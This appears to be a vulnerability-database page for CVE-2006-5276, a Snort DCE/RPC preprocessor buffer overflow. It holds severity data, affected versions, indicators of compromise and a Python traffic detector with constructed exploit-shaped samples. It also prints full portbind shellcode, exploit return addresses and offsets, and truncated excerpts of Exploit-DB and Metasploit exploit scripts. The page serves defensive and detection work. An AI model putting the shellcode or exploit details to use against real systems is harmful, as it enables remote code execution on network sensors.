CVE-2006-5276
Published: 2007-02-20
Priority: P268 · Severity: critical · CVSS 2.0 base score: 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see Exploit-DB and Metasploit entries below)
EPSS: 79.32% (99.6th percentile)
Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic.
Affected (version detail consolidated from the description and advisory notes on this page)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| snort | snort | 2.6.1, 2.6.1.1, 2.6.1.2 (<= 2.6.1.2) | 2.6.1.3 |
| snort | snort | 2.7.0 beta 1 | 2.7 beta 2 |
| sourcefire | intrusion_sensor | 4.1, 4.5, 4.6 | — |
Detection & IOCs (extracted from sources)
- bytes: \x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80 (Linux x86 portbind shellcode from the Exploit-DB Linux exploit; binds a shell on TCP port 4444, pushed as 0x115c)
- bytes: \xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8 (SMB header prefix: \xffSMB magic, command 0x75 = Tree Connect AndX, NT status 0, Flags 0x18, Flags2 0xc807 with the Unicode bit set)
- bytes: \x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10 (DCE/RPC v5.0 bind PDU header: packet type 0x0b, flags 0x03 = first and last fragment, little-endian data representation, frag_length 0x0210 = 528, auth_length 0, call_id 1, max_xmit_frag = max_recv_frag = 0x10b8 = 4280)
- bytes: \xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44 (Windows return address 0x7c941eed in little-endian byte order, a NOP, then add esp, 0xffffefff and inc esp to move the stack pointer off the overwritten frame before the payload runs)
- bytes: \x00\x00\xde\xad (NetBIOS Session Service header: session message with length 0xDEAD)
- bytes: \x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80\x00\x48\x00\x00\x00\xff\x01 (Write AndX parameter block: WordCount 14, AndXCommand 0xff = none, AndXOffset 0xdede, FID 0x4000, Offset 0, Timeout 0xffffffff, WriteMode 0x0080, Remaining 0x0048, Reserved 0, DataLength 0x01ff = 511)
- Exploit traffic targets TCP port 139 (NetBIOS/SMB) with crafted SMB Write AndX requests containing oversized DCE/RPC fragments; the Snort sensor itself is the victim, not the destination host.
- Look for SMB traffic with a NetBIOS Session Service length field set to 0xDEAD (\x00\x00\xde\xad), the Metasploit module's static oversized length marker.
- Detect two consecutive SMB Write AndX requests in a single TCP segment where the second Write AndX (parameter block starting \x0e\xff) carries an anomalously large DCE/RPC bind fragment; this is the overflow trigger pattern.
- On Linux targets, watch for a new listener on TCP port 4444 spawned by the snort process after exploitation (portbind shellcode).
- The Windows exploit uses a JMP ESP gadget at 0x7c941eed inside a standard Windows DLL; look for EIP/RET control redirected to that address in crash dumps or memory forensics.
- The Metasploit module uses a Windows Universal RET of 0x00407c01 (JMP ESP in snort.exe) with a payload offset of 289 bytes, and a Redhat 8 RET of 0xbffff110 with offset 317 bytes; both are useful for stack-frame analysis.
- SMB Tree Connect AndX targeting the IPC$ share path (\\<host>\IPC$) encoded in Unicode is present in all exploit variants as a precursor to the Write AndX overflow.
- Affected Snort versions are 2.6.1, 2.6.1.1, 2.6.1.2, and 2.7.0 beta 1; the fix is Snort 2.6.1.3+ or 2.7 beta 2+. The DCE/RPC preprocessor must be enabled in snort.conf for the vulnerability to be exploitable.
- SourceFire Intrusion Sensor versions 4.1, 4.5, and 4.6 are also vulnerable; patching scope extends beyond open-source Snort.
- The exploit is effective against any host on the Snort-monitored network segment; the destination host does not need to be running SMB, because Snort inspects the traffic passively and is itself the target.
- The Metasploit module deregisters the FILTER, PCAPFILE, SNAPLEN, and TIMEOUT options and uses raw packet injection (PacketFu/pcap), so the attacker needs raw socket / packet-injection capability on the monitored network.
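The indicators above can be checked mechanically. The Python detector below is an added example, not code from this page's sources or from Snort or Metasploit. It walks one raw TCP-139 segment by SMB structure (WordCount/ByteCount) rather than by the NetBIOS Session Service length, because the exploit sets that length to a bogus 0xDEAD, and it tags the IPC$ Tree Connect precursor, the falsified NBSS length, a DCE/RPC bind whose frag_length exceeds the Write AndX DataLength (a fragment the preprocessor must reassemble across writes), and stacked Write AndX requests in one segment. The two sample segments (BENIGN_SEGMENT, EXPLOIT_SEGMENT) are constructed inside the block, not captured traffic; the host name SENSOR, FID 0x4000 and the fragment sizes are assumptions. Since the vulnerable sensor is itself the victim, a check like this belongs on a patched sensor or in an offline pass over pcap, not in the vulnerable preprocessor path.

```python
"""Added detector for the CVE-2006-5276 exploit traffic shape (not the page's own code).
Parses one TCP segment payload of NetBIOS Session Service / SMB as seen on port 139."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_WRITE_ANDX = 0x2F
SMB_COM_TREE_CONNECT_ANDX = 0x75
DCERPC_PTYPE_BIND = 0x0B
NBSS_EXPLOIT_LEN = 0xDEAD                      # static NBSS length used by the Metasploit module
IPC_UTF16 = "ipc$".encode("utf-16-le")         # IPC$ as sent in a Unicode Tree Connect path


def parse_smb(buf, off):
    """Parse the SMB message at buf[off:]. Returns (command, words, data, end); end comes
    from WordCount/ByteCount, i.e. from the message itself, never from the NBSS length."""
    if buf[off:off + 4] != SMB_MAGIC or len(buf) < off + 33:
        return None
    command, wc = buf[off + 4], buf[off + 32]
    words = buf[off + 33:off + 33 + 2 * wc]
    bc_off = off + 33 + 2 * wc
    if len(words) != 2 * wc or len(buf) < bc_off + 2:
        return None
    (bc,) = struct.unpack_from("<H", buf, bc_off)
    return command, words, buf[bc_off + 2:bc_off + 2 + bc], bc_off + 2 + bc


def scan_segment(seg):
    """Return the list of indicator tags found in one TCP segment payload."""
    tags, writes, off = [], 0, 0
    while off + 4 <= len(seg) and seg[off] == 0:            # NBSS type 0 = session message
        nb_len = ((seg[off + 1] & 1) << 16) | struct.unpack_from(">H", seg, off + 2)[0]
        if nb_len == NBSS_EXPLOIT_LEN:
            tags.append("nbss_len_0xdead")
        if nb_len > len(seg) - off - 4:                      # declared length larger than what is here
            tags.append("nbss_len_exceeds_segment")
        smb = parse_smb(seg, off + 4)
        if smb is None:
            break
        cmd, words, data, end = smb
        if cmd == SMB_COM_TREE_CONNECT_ANDX and IPC_UTF16 in data.lower():
            tags.append("ipc_tree_connect")
        elif cmd == SMB_COM_WRITE_ANDX and len(words) >= 24:
            writes += 1
            # AndXCmd, AndXRsv, AndXOff, FID, Offset, Timeout, WriteMode, Remaining, Rsv, DataLen, DataOff
            fields = struct.unpack_from("<BBHHIIHHHHH", words)
            dlen, doff = fields[9], fields[10]
            payload = seg[off + 4 + doff:off + 4 + doff + dlen]   # DataOffset is relative to the SMB header
            if len(payload) >= 16 and payload[0] == 5 and payload[2] == DCERPC_PTYPE_BIND:
                (frag_len,) = struct.unpack_from("<H", payload, 8)
                if frag_len > dlen:                          # bind claims more than this write carries
                    tags.append(f"dcerpc_bind_frag_{frag_len}_exceeds_write_{dlen}")
        off = end                                            # next message starts where this one really ends
    if writes >= 2:
        tags.append("multiple_write_andx_in_segment")
    return tags


def is_exploit_pattern(tags):
    """Verdict: the 0xDEAD marker, or a cross-write bind fragment together with stacked
    Write AndX requests. IPC$ alone and a plain oversize NBSS length are not enough."""
    frag = any(t.startswith("dcerpc_bind_frag_") for t in tags)
    return "nbss_len_0xdead" in tags or (frag and "multiple_write_andx_in_segment" in tags)


# --- constructed sample traffic (built here to exercise the detector; not a capture) ---
def _smb(command, words, data, tid=0, uid=0):
    hdr = (SMB_MAGIC + bytes([command]) + b"\x00" * 4 + b"\x18" + struct.pack("<H", 0xC807)
           + b"\x00" * 12 + struct.pack("<HHHH", tid, 0, uid, 0))          # 32-byte SMB header
    return hdr + bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data


def _nbss(msg, length=None):
    n = len(msg) if length is None else length                # length=None gives an honest header
    return bytes([0, (n >> 16) & 1]) + struct.pack(">H", n & 0xFFFF) + msg


def _tree_connect_ipc(host="SENSOR"):                         # host name is an assumption
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)           # AndX none, flags 0, password length 1
    path = ("\\\\%s\\IPC$" % host).encode("utf-16-le") + b"\x00\x00"
    return _smb(SMB_COM_TREE_CONNECT_ANDX, words, b"\x00" + path + b"?????\x00")


def _dcerpc_bind(frag_len, carried):
    hdr = struct.pack("<BBBBIHHI", 5, 0, DCERPC_PTYPE_BIND, 0x03, 0x10, frag_len, 0, 1)
    return (hdr + struct.pack("<HHI", 0x10B8, 0x10B8, 0)).ljust(carried, b"\x00")


def _write_andx(fid, payload):
    doff = 32 + 1 + 28 + 2 + 1                                  # header, WordCount, words, ByteCount, pad
    words = struct.pack("<BBHHIIHHHHHI", 0xFF, 0, 0, fid, 0, 0xFFFFFFFF, 0x0008, 0, 0,
                        len(payload), doff, 0)
    return _smb(SMB_COM_WRITE_ANDX, words, b"\x00" + payload)


BENIGN_SEGMENT = _nbss(_tree_connect_ipc()) + _nbss(_write_andx(0x4000, _dcerpc_bind(72, 72)))
EXPLOIT_SEGMENT = (_nbss(_tree_connect_ipc())
                   + _nbss(_write_andx(0x4000, _dcerpc_bind(528, 80)), length=NBSS_EXPLOIT_LEN)
                   + _nbss(_write_andx(0x4000, _dcerpc_bind(528, 511)), length=NBSS_EXPLOIT_LEN))

if __name__ == "__main__":
    for name, seg in (("benign", BENIGN_SEGMENT), ("exploit", EXPLOIT_SEGMENT)):
        tags = scan_segment(seg)
        print(name, is_exploit_pattern(tags), tags)
```

is_exploit_pattern deliberately ignores nbss_len_exceeds_segment on its own: a legitimate SMB message larger than one TCP segment produces that tag on its first segment, so it is reported for context but only the 0xDEAD marker or the cross-write bind fragment plus stacked Write AndX requests yields a verdict.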
No detection rules found.
Exploit-DB
Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)
exploitdb · 2012-04-09
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # Class header and the 'Name' key restored: the page's HTML extraction dropped
  # the text between '<' and '>'. The Capture mixin provides the FILTER/PCAPFILE/
  # SNAPLEN/TIMEOUT options this module deregisters.
  include Msf::Exploit::Capture

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Snort 2 DCE/RPC preprocessor Buffer Overflow',
      'Description' => %q{
        This module allows remote attackers to execute arbitrary code by exploiting the
        Snort service via crafted SMB traffic. The vulnerability is due to a boundary
        error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
        which may result in a stack-based buffer overflow with a specially crafted packet
        sent on a network that is monitored by Snort.
        Vulnerable versions inclu
Exploit-DB
Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
exploitdb · 2007-03-30 · CVSS 10.0 (critical)
---
#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux x86 portbind shellcode; binds a shell on TCP port 4444 (pushed as 0x115c).
# The string is completed here from the full shellcode bytes listed under Detection & IOCs above.
shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
shellcode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
shellcode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
shellcode += "\x89\xe1\xcd\x80"
Exploit-DB
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow
exploitdb · 2007-03-01
---
#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
#
# Author: Trirat Puttaraksa
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################
import sys
from scapy import *
from struct import pack
conf.verb = 0
# NetBIOS Session Service header: session message, length 0x02ab
payload = "\x00\x00\x02\xab"
# SMB header: \xffSMB magic, command 0x75 (Tree Connect AndX), NT status 0, Flags 0x18, Flags2 0xc807
payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
payload += "\x00\x
Exploit-DB
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)
exploitdb · 2007-02-23
---
#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
#
# Author: Trirat Puttaraksa
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution
# may be possible, but I have no time to make it :(
# I will post the information about this vulnerability in my blog soon
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/)
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################
import sys
from scapy import *
from struct import pack
conf.verb = 0
# NetBIOS S
Metasploit
Snort 2 DCE/RPC Preprocessor Buffer Overflow
This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result in a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
References
- http://fedoranews.org/updates/FEDORA-2007-206.shtml
- http://iss.net/threats/257.html
- http://secunia.com/advisories/24190
- http://secunia.com/advisories/24235
- http://secunia.com/advisories/24239
- http://secunia.com/advisories/24240
- http://secunia.com/advisories/24272
- http://secunia.com/advisories/26746
- http://security.gentoo.org/glsa/glsa-200703-01.xml
- http://www.kb.cert.org/vuls/id/196240
- http://www.osvdb.org/32094
- http://www.securityfocus.com/archive/1/461810/100/0/threaded
- http://www.securityfocus.com/bid/22616
- http://www.securitytracker.com/id?1017669
- http://www.securitytracker.com/id?1017670
- http://www.snort.org/docs/advisory-2007-02-19.html
- http://www.us-cert.gov/cas/techalerts/TA07-050A.html
- http://www.vupen.com/english/advisories/2007/0656
- http://www.vupen.com/english/advisories/2007/0668
- http://www116.nortelnetworks.com/pub/repository/CLARIFY/DOCUMENT/2007/08/021923-01.pdf
- http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173
- https://bugzilla.redhat.com/show_bug.cgi?id=229265
- https://exchange.xforce.ibmcloud.com/vulnerabilities/31275
- https://www.exploit-db.com/exploits/3362